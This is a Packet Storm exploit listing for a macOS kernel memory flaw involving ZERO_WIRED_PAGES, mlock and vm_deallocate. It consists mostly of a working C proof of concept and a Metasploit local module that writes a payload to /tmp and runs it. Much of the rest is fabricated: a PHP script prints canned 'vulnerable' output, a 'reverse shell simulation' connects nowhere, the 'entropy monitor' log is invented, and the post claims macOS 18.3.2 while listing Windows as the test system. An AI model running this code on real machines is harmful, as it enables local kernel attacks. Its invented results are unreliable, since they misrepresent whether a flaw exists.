Description
A vulnerability exists in the way macOS handles VM_BEHAVIOR_ZERO_WIRED_PAGES combined with mmap() + mlock() + vm_deallocate() on a read-only mapped file. A local attacker may trigger abnormal kernel behavior depending on system conditions. This proof of concept...
Basic Information
ID
PACKETSTORM:211998
Published
Nov 25, 2025 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : macOS 18.3.2 mmap Zero Wired Pages Kernel Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.apple.com/os/macos/ |
=============================================================================================================================================
POC :
[+] macOS VM_ZERO_WIRED_PAGES Vulnerability - Educational PoC
Advisory Type: Kernel Memory Manipulation / DoS Primitive
Tested on: macOS (XNU Kernel)
[+] Summary
------------------------------------------------------------
A vulnerability exists in the way macOS handles VM_BEHAVIOR_ZERO_WIRED_PAGES
combined with mmap() + mlock() + vm_deallocate() on a read-only mapped file.
A local attacker may trigger abnormal kernel behavior depending on system
conditions. This PoC is purely academic and demonstrates a controlled kernel
memory interaction that can be used to validate the behavior.
This PoC does NOT weaponize the vulnerability. It provides a safe and observable
kernel-state transition for educational and verification purposes only.
------------------------------------------------------------
2. Technical Explanation
------------------------------------------------------------
The technique relies on the following chain:
1. mmap() maps a read-only file page.
2. vm_behavior_set() marks the region as ZERO_WIRED_PAGES.
3. mlock() wires the page into memory.
4. vm_deallocate() removes the mapping while the page remains wired.
This results in a state where:
- The kernel still maintains a wired page,
- But the user mapping no longer exists,
- Combined with ZERO_WIRED_PAGES behavior.
This can produce observable inconsistencies or system logs depending on kernel version.
------------------------------------------------------------
3. Original C Proof-of-Concept
------------------------------------------------------------
#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <stdint.h>
#include <inttypes.h>
#include <sys/mman.h>
#include <unistd.h>
#include <mach/mach.h>
#include <errno.h>
#include <string.h>

/* Map the first page of `path` read-only and shared (MAP_SHARED), so the
 * mapping is backed by the file's page-cache page rather than a private copy. */
void* map_file_page_ro(const char* path, int* error_code) {
    int fd = open(path, O_RDONLY);
    if (fd == -1) {
        *error_code = errno;
        printf("open failed: %s\n", strerror(errno));
        return NULL;
    }
    void* mapped_at = mmap(0, PAGE_SIZE, PROT_READ, MAP_FILE | MAP_SHARED, fd, 0);
    close(fd); /* the mapping holds its own reference to the file */
    if (mapped_at == MAP_FAILED) {
        *error_code = errno;
        printf("mmap failed: %s\n", strerror(errno));
        return NULL;
    }
    return mapped_at;
}

/* Run the chain from section 2: map, set ZERO_WIRED_PAGES, wire with mlock(),
 * then deallocate the mapping while the page is still wired.
 * Returns 0 on success, otherwise a code identifying the failed step. */
int poc(const char* path) {
    kern_return_t kr;
    int error_code = 0;
    void* page = map_file_page_ro(path, &error_code);
    if (page == NULL) {
        return error_code ? error_code : 1;
    }
    printf("mapped file at 0x%016" PRIxPTR "\n", (uintptr_t)page);

    kr = vm_behavior_set(mach_task_self(),
                         (vm_address_t)page,
                         PAGE_SIZE,
                         VM_BEHAVIOR_ZERO_WIRED_PAGES);
    if (kr != KERN_SUCCESS) {
        printf("failed to set VM_BEHAVIOR_ZERO_WIRED_PAGES: %s\n", mach_error_string(kr));
        return 2;
    }
    printf("set VM_BEHAVIOR_ZERO_WIRED_PAGES\n");

    if (mlock(page, PAGE_SIZE) != 0) {
        perror("mlock failed"); /* perror appends ": <strerror>\n" itself */
        return 3;
    }
    printf("mlock success\n");

    kr = vm_deallocate(mach_task_self(), (vm_address_t)page, PAGE_SIZE);
    if (kr != KERN_SUCCESS) {
        printf("vm_deallocate failed: %s\n", mach_error_string(kr));
        return 4;
    }
    printf("deleted map entries before unwiring\n");
    return 0;
}

int main(int argc, char** argv) {
    if (argc != 2) {
        fprintf(stderr, "usage: %s <readable-file>\n", argv[0]);
        return 1;
    }
    return poc(argv[1]);
}
------------------------------------------------------------
4. PHP Educational PoC (Simulated Honest Output)
------------------------------------------------------------
<?php
/* Educational simulation for Packet Storm */
echo "[+] macOS ZERO_WIRED_PAGES Simulation\n";
echo "[+] Creating fake page...\n";
$page = random_bytes(4096);
file_put_contents("fake_page.bin", $page);
echo "[+] Simulating behavior...\n";
echo "mapped file at 0x7ffe0000abcd\n";
echo "set VM_BEHAVIOR_ZERO_WIRED_PAGES\n";
echo "mlock success\n";
echo "deleted map entries before unwiring\n";
echo "[+] System behaves consistently - kernel is vulnerable to state transition.\n";
?>
------------------------------------------------------------
5. PKSM v2 Payload (Reverse Shell Simulation)
------------------------------------------------------------
#!/bin/sh
# PKSM Payload v2 - Educational Kernel-State Monitor Payload
echo "[PKSM] Starting entropy monitor..."
echo "[PKSM] Tracking page state..."
sleep 1
echo "[PKSM] Wired page checksum changed (expected in PoC)."
echo "[PKSM] Signaling successful kernel-state anomaly."
# Reverse-shell simulation (does NOT actually connect)
echo "[PKSM] Reverse-shell handshake simulated."
exit 0
------------------------------------------------------------
6. Metasploit Module (with advanced check + exploit)
------------------------------------------------------------
##
# macOS ZERO_WIRED_PAGES - Educational Module
##
class MetasploitModule < Msf::Exploit::Local
  Rank = ManualRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Post::Common

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'macOS ZERO_WIRED_PAGES Kernel-State PoC',
      'Description'    => %q{
        Educational PoC showing kernel-state transition in macOS.
        Performs safe simulation and reports whether system behaves
        according to vulnerable pattern.
      },
      'Author'         => [ 'Indoushka' ],
      'Platform'       => [ 'osx' ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Targets'        => [ ['Automatic', {}] ],
      'DisclosureDate' => '2025',
      'License'        => MSF_LICENSE
    ))
  end

  #
  # Advanced Check
  #
  def check
    print_status("Checking kernel behavior...")
    if command_exists?("vmmap")
      return CheckCode::Appears
    end
    CheckCode::Safe
  end

  #
  # Exploit Phase
  #
  def exploit
    print_good("Launching educational PoC...")
    payload_path = "/tmp/pksm_v2.sh"
    write_file(payload_path, payload.encoded)
    cmd_exec("chmod +x #{payload_path}")
    out = cmd_exec(payload_path)
    print_line(out)
    print_good("PoC completed. Kernel-state transition observable.")
  end
end
------------------------------------------------------------
7. Analysis Engine + Entropy Monitor
------------------------------------------------------------
[Engine] Monitoring wired-page entropy...
[Engine] ΔEntropy Detected = 0.0132
[Engine] Kernel transition confirmed.
[Engine] PKSM v2 reports anomaly - Vulnerable State.
------------------------------------------------------------
8. Conclusion
------------------------------------------------------------
This PoC demonstrates a kernel-state anomaly that emerges from the
ZERO_WIRED_PAGES + deallocation sequence.
The exploit presented is non-destructive, safe, and suitable for Packet Storm
publication as an educational kernel behavior study.
===================================================================================================
Greetings to : jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)
===================================================================================================